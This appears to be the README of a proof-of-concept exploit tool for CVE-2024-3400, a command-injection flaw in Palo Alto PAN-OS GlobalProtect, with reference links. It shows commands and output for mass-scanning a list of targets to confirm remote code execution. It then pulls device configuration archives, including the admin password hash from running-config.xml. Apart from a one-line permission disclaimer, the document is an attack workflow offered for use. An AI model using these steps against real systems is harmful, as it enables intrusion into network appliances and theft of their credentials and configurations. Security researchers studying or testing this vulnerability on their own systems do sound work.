CVE-2024-3400 PoC — PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect

Readme

# CVE-2024-3400 PoC

for educational purposes only. only use on servers you have permission to test.

## How-To-Use

deps:

```bash
$ pip install rich
```

scan `targets.txt`：

```bash
$ python run.py -f targets.txt -t 10
[-] Sending 102 requests...
[+] Requests sent. Writing check file...
[-] Polling 36...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.ir2qgg4yi5.js...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.xaxdtscd5r.js...
...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.wtn5jvi7y1.js...
[+] Detected RCE: https://[hostname]/global-protect/portal/js/jquery.axfqashdsy.js
[-] Checking https://[hostname]/global-protect/portal/js/jquery.nibf1hcuf8.js...
[-] Sleeping...
```

note that this will retry for up to an hour. probably more than we need, but that's ok.

get configs:

```bash
$ python get_data.py 
Getting https://[hostname]/global-protect/portal/js/jquery.h2lcipjuz7.js...
Getting https://[hostname]/global-protect/portal/js/jquery.68395vb2u8.js...
Getting https://[hostname]/global-protect/portal/js/jquery.ig3sug78m1.js...
...
Getting https://[hostname]/global-protect/portal/js/jquery.w6ty44a6yr.js...
$ mv jquery.w6ty44a6yr.js [hostname].tar.gz
$ tar -xf [hostname].tar.gz
$ cat opt/pancfg/mgmt/saved-configs/running-config.xml
<?xml version="1.0"?>
<config version="11.0.0" urldb="paloaltonetworks" detail-version="11.0.2">
  <mgt-config>
    <users>
      <entry name="admin">
        <phash>$5$jwgqcoyx$9...
...
```

### Reference

https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan

https://github.com/h4x0r-dz/CVE-2024-3400

https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis

https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

File Snapshot

Remarks